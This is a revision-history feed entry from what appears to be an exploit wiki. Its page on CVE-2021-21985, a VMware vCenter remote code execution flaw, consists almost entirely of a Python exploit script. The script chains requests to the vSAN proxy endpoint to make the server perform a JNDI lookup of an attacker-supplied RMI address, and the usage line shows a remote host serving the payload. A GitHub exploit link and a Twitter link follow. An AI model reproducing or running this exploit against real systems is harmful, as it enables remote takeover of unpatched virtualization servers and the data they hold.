https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2021-21985_VMware_vCenter_%E9%81%A0%E7%A8%8B%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2Fpt CVE-2021-21985 VMware vCenter 遠程任意代碼執行漏洞/pt - Revision history 2026-04-04T04:57:37Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2021-21985_VMware_vCenter_%E9%81%A0%E7%A8%8B%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/pt&diff=4071&oldid=prev Pwnwiki: Created page with "== Referência ==" 2021-06-05T01:49:23Z <p>Created page with &quot;== Referência ==&quot;</p> <p><b>New page</b></p><div>&lt;languages /&gt;<br /> == Captura de tela ==<br /> [[File:Twitter_E3CB24AUUAEl1_8.jpg | 800px ]]<br /> <br /> <br /> ==EXP==<br /> &lt;pre&gt;<br /> import requests<br /> import sys<br /> import json<br /> def send_request(host,uri,json):<br /> try:<br /> req = requests.post(url=host+baseuri+uri,json=json,headers=headers,verify=False)<br /> return req.text<br /> except:<br /> return False<br /> def check_false(request):<br /> if request ==False or 'result' not in request:<br /> print(&quot;[*] No Vuln!&quot;)<br /> return True<br /> if __name__ == '__main__':<br /> if len(sys.argv) &lt; 2:<br /> print('''python3 cve-2021-21985.py https://host rmi://8.8.8.8:1099/Exploit''')<br /> sys.exit()<br /> host = sys.argv[1]<br /> payload = sys.argv[2]<br /> baseuri = &quot;ui/h5-vsan/rest/proxy/service/&amp;vsanQueryUtil_setDataService&quot;<br /> uris = [&quot;/setTargetObject&quot;, &quot;/setStaticMethod&quot;, &quot;/setTargetMethod&quot;, &quot;/setArguments&quot;, &quot;/prepare&quot;, &quot;/invoke&quot;]<br /> headers = {'Content-Type': 'application/json', &quot;User-Agent&quot;: &quot;pentest&quot;}<br /> stage_setTargetObject = json.loads('{&quot;methodInput&quot;:[null]}')<br /> stage_setStaticMethod = json.loads('{&quot;methodInput&quot;:[&quot;javax.naming.InitialContext.doLookup&quot;]}')<br /> stage_setTargetMethod = json.loads('{&quot;methodInput&quot;:[&quot;doLookup&quot;]}')<br /> stage_setArguments = json.loads('{&quot;methodInput&quot;:[[&quot;%s&quot;]]}'%payload)<br /> stage_prepare = json.loads('{&quot;methodInput&quot;:[]}')<br /> print(&quot;[*] start init TargetObject&quot;)<br /> # init TargetObject<br /> init_request = send_request(host,uris[0],json=stage_setTargetObject)<br /> if check_false(init_request):<br /> print(&quot;[*] init failed!&quot;)<br /> exit()<br /> # Step2 setStaticMethod<br /> StaticMethod = send_request(host,uris[1],json=stage_setStaticMethod)<br /> if check_false(init_request):<br /> print(&quot;[*] StaticMethod init failed!&quot;)<br /> exit()<br /> # Step3 setTargetMethod<br /> StaticMethod = send_request(host,uris[2],json=stage_setTargetMethod)<br /> if check_false(init_request):<br /> print(&quot;[*] setTarget Method failed!&quot;)<br /> exit()<br /> # Step4 setArguments<br /> # print(stage_setArguments)<br /> setArguments = send_request(host,uris[3],json=stage_setArguments)<br /> if check_false(init_request):<br /> print(&quot;[*] setArguments failstage_setArgumentsed!&quot;)<br /> exit()<br /> # Step5 prepare<br /> setArguments = send_request(host,uris[4],json=stage_prepare)<br /> if check_false(init_request):<br /> print(&quot;[*] stage_prepare failed!&quot;)<br /> exit()<br /> # Step6 invoke<br /> setArguments = send_request(host,uris[5],json=stage_prepare)<br /> if check_false(init_request):<br /> print(&quot;[*] invoke failed!&quot;)<br /> exit()<br /> &lt;/pre&gt;<br /> <br /> <br /> == Referência ==<br /> https://github.com/xnianq/cve-2021-21985_exp/<br /> <br /> https://twitter.com/_0xf4n9x_?s=21</div> Pwnwiki